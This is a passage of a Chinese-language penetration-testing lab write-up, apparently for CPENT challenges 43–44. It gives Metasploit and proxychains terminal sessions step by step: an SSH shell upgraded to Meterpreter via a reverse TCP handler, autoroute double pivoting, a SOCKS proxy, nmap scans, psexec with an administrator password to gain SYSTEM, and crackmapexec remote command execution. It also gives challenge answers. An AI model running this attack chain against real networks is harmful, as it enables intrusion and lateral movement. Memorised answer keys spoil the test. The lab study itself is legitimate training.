-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.200.6:34219 -> 172.16.65.200:22
(172.16.65.200)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.200.6:4433
[*] Sending stage (1017704 bytes) to 172.16.65.200
[*] Meterpreter session 2 opened (192.168.200.6:4433 -> 172.16.65.200:52490) at 2023-05-11 21:51:59 -0400
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > run autoroute -s 192.168.5.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.5.0/255.255.255.0...
[+] Added route to 192.168.5.0/255.255.255.0 via 172.16.65.200
[*] Use the -p option to list all active routes
meterpreter > bg
[*] Backgrounding session 2...
接下來是要設定proxychain,讓我們可以不透過msf即可摸到.5網段,先設定msf:
msf6 auxiliary(scanner/ssh/ssh_login) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to
listen on. This must be an address on t
he local machine or 0.0.0.0 to listen o
n all addresses.
SRVPORT 1080 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted: 4a,
5)
When VERSION is 5:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set srvport 9010
srvport => 9010
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
接下來開啟另一個terminal:
┌──(root㉿kali)-[~]
└─# vim /etc/proxychains4.conf
裡面內容跟上面提過的一致,但最後一行是
socks4 127.0.0.1 9010
如果上面有其他socks <IP> <Port>形式的行,可以註解掉或是刪掉,避免混亂。
做完以上設定,就可以摸到.5網段,下面試一下是不是能掃.5:
┌──(root㉿kali)-[~]
└─# proxychains nmap 192.168.5.100 -sT -n -Pn -sC -sV -p445 --disable-arp-ping
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 21:55 EDT
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:46946 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:24034 <--denied
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:9010 ... 192.168.5.100:445 ... OK
Nmap scan report for 192.168.5.100
Host is up (0.022s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7600 microsoft-ds
Service Info: OS: Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7600 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::-
| Computer name: WIN-6HAVIPITA2C
| NetBIOS computer name: WIN-6HAVIPITA2C\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-05-11T18:55:22-07:00
|_clock-skew: mean: 2h20m00s, deviation: 4h02m32s, median: -1s
| smb2-time:
| date: 2023-05-12T01:55:18
|_ start_date: 2021-12-24T09:07:49
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.23 seconds
接下來打入.5主機:
msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.5.100
rhosts => 192.168.5.100
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass Pa$$w0rd123
smbpass => Pa$$w0rd123
msf6 exploit(windows/smb/psexec) > set smbshare C$
smbshare => C$
msf6 exploit(windows/smb/psexec) > set lport 4460
lport => 4460
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.5.100:445 - Connecting to the server...
[*] 192.168.5.100:445 - Authenticating to 192.168.5.100:445 as user 'administrator'...
[*] 192.168.5.100:445 - Selecting PowerShell target
[*] 192.168.5.100:445 - Executing the payload...
[+] 192.168.5.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.5.100:4460
[*] Sending stage (175686 bytes) to 192.168.5.100
[*] Meterpreter session 3 opened (192.168.5.200:51578 -> 192.168.5.100:4460 via session 2) at 2023-05-11 21:58:56 -0400
meterpreter > sessions -l
Usage: sessions <id>
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>
meterpreter > bg
[*] Backgrounding session 3...
msf6 exploit(windows/smb/psexec) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.200.6:34219 -
> 172.16.65.200:22 (1
72.16.65.200)
2 meterpreter x86/linu vagrant @ 172.16.65.2 192.168.200.6:4433 ->
x 00 172.16.65.200:52490
(172.16.65.200)
3 meterpreter x86/wind NT AUTHORITY\SYSTEM @ 192.168.5.200:51578 -
ows WIN-6HAVIPITA2C > 192.168.5.100:4460
via session 2 (192.16
8.5.100)
因為.5.100同時有.35網卡,所以可以進入它的interactive模式再把路由加進去:
msf6 exploit(windows/smb/psexec) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > run autoroute -s 192.168.35.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.35.0/255.255.255.0...
[+] Added route to 192.168.35.0/255.255.255.0 via 192.168.5.100
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.5.0 255.255.255.0 Session 2
192.168.35.0 255.255.255.0 Session 3
接下來就可以開另一個視窗,直接從攻擊機掃.35網段。相關問題:
4.Challenge 43: (50 Points)
What is the domain NAME of the machine at IP address 192.168.35.100?
Ans: CPENT.LOCALNET
5.Challenge 44: (50 Points)
What is the NetBIOS 16th Byte with the type of UNIQUE on the machine at the 192.168.35 network? (Hint: starts with 1) Ans: 1D
┌──(root㉿kali)-[~]
└─# proxychains nmap -Pn -sT -sC -sV -p445 192.168.35.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 02:22 EDT
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:51711
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:33501
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
[proxychains] Dynamic chain ... 192.168.200.9:9010 ... 192.168.35.100:445 .
Nmap scan report for 192.168.35.100
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: CPENT.LOCALNET)
Service Info: Host: TARGETTHREE
Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m04s, median: -2s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: ubuntu
| NetBIOS computer name: TARGETTHREE\x00
| Domain name: \x00
| FQDN: ubuntu
|_ System time: 2023-04-22T14:22:54+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-22T06:22:50
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap
Nmap done: 1 IP address (1 host up) scanned in 21.14 seconds
┌──(root㉿kali)-[~]
└─# proxychains nbtscan 192.168.35.100 -v
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Doing NBT name scan for addresses from 192.168.35.100
第4題,是掃445port可得的,所以直接指定IP跟port去掃,答案藏在workgroup的右邊。
接下來第5題,是利用已知的smb帳密,透過crackmapexec來遠端192.168.35.100得知答案,由下列可知是1D。
┌──(root㉿kali)-[~]
└─# proxychains4 crackmapexec smb -d . -u administrator -p 'Pa$$w0rd123' -x "cm d.exe /c nbtstat -A 192.168.35.100" 192.168.5.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 192.168.200.6:9010 ... 192.168.5.100:445 .. . OK
[proxychains] Dynamic chain ... 192.168.200.6:9010 ... 192.168.5.100:135 .. . OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [*] Windows Server 2008 R2 Standard 7600 x64 (name:WIN-6HAVIPITA2C) (domain:.) (signing:False) (SMBv1:True)
[proxychains] Dynamic chain ... 192.168.200.6:9010 ... 192.168.5.100:445 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [+] .\administrator:Pa$$w0rd 123 (Pwn3d!)
[proxychains] Dynamic chain ... 192.168.200.6:9010 ... 192.168.5.100:135 ... OK
[proxychains] Dynamic chain ... 192.168.200.6:9010 ... 192.168.5.100:49155 ... OK
SMB 192.168.5.100 445 WIN-6HAVIPITA2C [+] Executed command
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Local Area Connection 2:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Node IpAddress: [192.168.35.3] Scope Id: []
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C NetBIOS Remote Machine Name Table
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Name Type Status
SMB 192.168.5.100 445 WIN-6HAVIPITA2C ---------------------------------------------
SMB 192.168.5.100 445 WIN-6HAVIPITA2C TARGETTHREE <00> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C TARGETTHREE <03> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C TARGETTHREE <20> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C ..__MSBROWSE__.<01> GROUP Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C CPENT.LOCALNET <00> GROUP Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C CPENT.LOCALNET <1D> UNIQUE Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C CPENT.LOCALNET <1E> GROUP Registered
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C MAC Address = 00-00-00-00-00-00
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Local Area Connection:
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Node IpAddress: [192.168.5.100] Scope Id: []
SMB 192.168.5.100 445 WIN-6HAVIPITA2C
SMB 192.168.5.100 445 WIN-6HAVIPITA2C Host not found.
Reference
Exploiting SMB(samba) without Metasploit series -1
smbclient操作命令,服务器文件传输 - 简书
Offensive Security Cheatsheet
How APTs Use Reverse Proxies to Nmap Internal Networks
Explore Hidden Networks With Double Pivoting – Pentest Blog
Pivoting and Portforwarding - Pentest Everything
How to Implement Pivoting and Relaying Techniques Using Meterpreter
内网安全之:Metasploit 跳板攻击:portfwd 端口转发与端口映射
Network Pivoting Techniques
Whitelist: METASPLOIT - Double Pivoting
Pivoting - part 2. Proxychains. Metasploit. Practical example. - cocomelonc
Double & Triple Pivoting and Proxychains using Chisel – Steven Meow's Blog 🐱
https://alomancy.gitbook.io/guides/cheat-sheets/tunnelling-pivoting-and-proxies
SSH Tunneling (Port Forwarding) 詳解
Offensive Security Guide to SSH Tunnels and Proxies
SSH隧道详解与使用AutoSSH实现稳定的内网穿透-腾讯云开发者社区-腾讯云
Chisel with Proxychains - Techno Herder
